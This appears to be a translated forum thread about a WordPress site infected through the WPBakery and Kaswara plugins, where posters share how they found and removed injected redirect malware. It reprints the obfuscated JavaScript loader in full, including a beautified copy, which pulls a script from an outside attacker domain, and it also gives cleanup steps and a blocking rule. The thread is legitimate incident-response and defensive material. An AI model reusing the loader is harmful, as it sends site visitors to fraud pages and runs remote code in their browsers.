Wordpress WPBakery 和 Kaswara 安全漏洞

Wordpress WPBakery and Kaswara security Vulnerability

我遇到了一个问题,我为其提供维护的 Wordpress 网站之一会奇怪地将用户(不受 AdBlocker 保护)重定向到欺诈网站。

重定向已通过stick.travelinskydream.ga完成。

经过仔细检查,具有以下代码的脚本已自动注入到应用程序中。使用了以下代码:

var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);

它创建了一个 script 标签来执行外部 JS 代码,在加载时将用户重定向到恶意网站。结果脚本如下所示:

<script src="https://stick.travelinskydreams.ga?Brand.js?vid=0000&pidi=191817&id=53646"></script>

据我所知,该漏洞存在于 WpBakery 和 Kaswara 插件中,并且是一个已知问题。

https://www.wordfence.com/blog/2020/10/episode-90-wpbakery-plugin-vulnerability-exposes-over-4-million-sites/

https://howtofix.guide/fake-jquery-migrate-plugin/

在一个接一个地停用和重新激活插件后,仅有的两个罪魁祸首仍然是 js_composer(Wp Bakery)和 Kaswara。我已尝试更新这两个插件,但“感染”仍然存在,即使已针对此问题发布了补丁。

解决方案很简单:几个小时后,在 Wordpress 仪表板中,在 Kaswara 菜单 > 自定义代码部分,问题中出现的代码就在那里。删除后一切恢复正常

这肯定不是此类恶意软件破坏工作的唯一方式,因此我将此 link 附加到其他可能的影响。

https://www.wordfence.com/blog/2021/04/psa-remove-kaswara-modern-wpbakery-page-builder-addons-plugin-immediately/

一个对我有用的潜在解决方法是添加这个自定义脚本,它将在恶意 JS 加载后删除它(临时解决方案,不删除病毒):

$('script').each(function(index, obj) {
console.log(index, obj);
if (obj.src === 'https://stick.travelinskydream.ga/brand.js&v=0032&sid=236&pid=545747') {
    $(this).remove();
    console.log($(this).text());
}

if ($(this).text() === "var _0x230d=['getElementsByTagName','script','parentNode','279875vBeEEE','head','698448rkGfeF','679597pxmSpW','281314aeWSVS','1fashtG','currentScript','1439788dxeSnm','src','1051197hJyWzE','277011vIvjKc','2vRLkLk','fromCharCode','1YWwfcj'];var _0x3e5356=_0x567b;function _0x567b(_0x4f69c6,_0x44f06a){_0x4f69c6=_0x4f69c6-0x161;var _0x230d0d=_0x230d[_0x4f69c6];return _0x230d0d;}(function(_0x23c6e3,_0x4b8159){var _0x137209=_0x567b;while(!![]){try{var _0x388290=-parseInt(_0x137209(0x168))*parseInt(_0x137209(0x16a))+parseInt(_0x137209(0x16f))+-parseInt(_0x137209(0x165))*-parseInt(_0x137209(0x161))+-parseInt(_0x137209(0x16c))+parseInt(_0x137209(0x167))+parseInt(_0x137209(0x16e))+-parseInt(_0x137209(0x170))*-parseInt(_0x137209(0x169));if(_0x388290===_0x4b8159)break;else _0x23c6e3['push'](_0x23c6e3['shift']());}catch(_0x227ada){_0x23c6e3['push'](_0x23c6e3['shift']());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x74,0x69,0x63,0x6b,0x2e,0x74,0x72,0x61,0x76,0x65,0x6c,0x69,0x6e,0x73,0x6b,0x79,0x64,0x72,0x65,0x61,0x6d,0x2e,0x67,0x61,0x2f,0x62,0x72,0x61,0x6e,0x64,0x2e,0x6a,0x73,0x26,0x76,0x3d,0x30,0x30,0x33,0x32,0x26,0x73,0x69,0x64,0x3d,0x32,0x33,0x36,0x26,0x70,0x69,0x64,0x3d,0x35,0x34,0x35,0x37,0x34,0x37),d=document,s=d['createElement'](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm;document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);") {
    $(this).remove() 
}

这是被注入JS的“美化”恶意代码,说不定对大家有帮助

var _0x3e5356 = _0x567b;

function _0x567b(_0x4f69c6, _0x44f06a) {
    _0x4f69c6 = _0x4f69c6 - 0x161;
    var _0x230d0d = _0x230d[_0x4f69c6];
    return _0x230d0d;
}(function(_0x23c6e3, _0x4b8159) {
    var _0x137209 = _0x567b;
    while (!![]) {
        try {
            var _0x388290 = -parseInt(_0x137209(0x168)) * parseInt(_0x137209(0x16a)) + parseInt(_0x137209(0x16f)) + -parseInt(_0x137209(0x165)) * -parseInt(_0x137209(0x161)) + -parseInt(_0x137209(0x16c)) + parseInt(_0x137209(0x167)) + parseInt(_0x137209(0x16e)) + -parseInt(_0x137209(0x170)) * -parseInt(_0x137209(0x169));
            if (_0x388290 === _0x4b8159) break;
            else _0x23c6e3['push'](_0x23c6e3['shift']());
        } catch (_0x227ada) {
            _0x23c6e3['push'](_0x23c6e3['shift']());
        }
    }
}(_0x230d, 0xb70ce));
var mm = String[_0x3e5356(0x171)](0x68, 0x74, 0x74, 0x70, 0x73, 0x3a, 0x2f, 0x2f, 0x73, 0x74, 0x69, 0x63, 0x6b, 0x2e, 0x74, 0x72, 0x61, 0x76, 0x65, 0x6c, 0x69, 0x6e, 0x73, 0x6b, 0x79, 0x64, 0x72, 0x65, 0x61, 0x6d, 0x2e, 0x67, 0x61, 0x2f, 0x62, 0x72, 0x61, 0x6e, 0x64, 0x2e, 0x6a, 0x73, 0x26, 0x76, 0x3d, 0x30, 0x30, 0x33, 0x32, 0x26, 0x73, 0x69, 0x64, 0x3d, 0x32, 0x33, 0x36, 0x26, 0x70, 0x69, 0x64, 0x3d, 0x35, 0x34, 0x35, 0x37, 0x34, 0x37),
    d = document,
    s = d['createElement'](_0x3e5356(0x163));
s[_0x3e5356(0x16d)] = mm;
document[_0x3e5356(0x16b)] ? document[_0x3e5356(0x16b)][_0x3e5356(0x164)]['insertBefore'](s, document[_0x3e5356(0x16b)]) : d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0]['appendChild'](s);

如果您发现任何其他问题或受到此影响,请分享您的解决方案!

刚刚用 BASE64 编码的 JS 脚本找到了这个选项。找到并删除它。

Look for this entrie on you WP_OPTIONS table

这里发生了什么?

此恶意软件是 Javascript 内容 触发 GET travelinski 内容 brand.js。

它的内容以 BASE64 编码,以干扰 SH 或 Select 查询对其的检测。当在屏幕上调用时,它变成一个可执行片段。

可能会出现在不同的an下option_name,但内容本身一定不会有太大的变化。

所以任何正在寻找这个问题的人,这里是原因和解决方案。

原因

插件:WP-Bakery (JS Composer) 和 Kaswara 插件有这个问题。

解决方案

您需要从 wp_options table 中删除一项。

  • 首先登录cPanel。
  • 转到 PHPMYADMIN
  • Select您网站的数据库(有问题)
  • 然后前往wp_options table.
  • 正如我的朋友 Andre 提到的,条目可能有不同的 wp_option_name。
  • 您需要在 Filter Rows 输入字段中输入 JS
  • 它会给你结果,现在寻找 option_value 开头:dmFyIF
  • 删除该条目,大功告成。

清理网站并删除 kaswara 中的 extrajs 并使用 wordfence 执行全面扫描后:

对于在 5 月 21 日之前尝试解决此问题的每个 wordfence 免费增值用户,我建议:

在 wordfence-waf.php 中,将这些行放在

if(!empty($_GET['action']) && $_GET['action'] == 'uploadFontIcon'){
   die('Good luck');
}

然后当您在 5 月 21 日收到 wordfence 更新时恢复为原来的状态

非常感谢。我让我的网站感染了这个,从备份恢复后,才看到 2 周后是否再次感染。找到了 db 条目,还在 kaswara 的自定义设置中看到了脚本。我会看看如何最好地替换我使用它的东西,然后删除它。

知道他们是怎么进来的吗?我可以添加 htaccess 指令来阻止它们吗?

我找到了这份报告并进行了挖掘,并在 kaswara 图标文件夹中找到了 8 天前上传的 p.php 文件 /uploads/kaswara/icon/slt

https://wpscan.com/vulnerability/8d66e338-a88f-4610-8d12-43e8be2da8c5

删除 kaswara 插件后,可能通过 phpmyadmin 转到 mysql, 找到 wp_options table 并删除 kasvaracustomjs option_name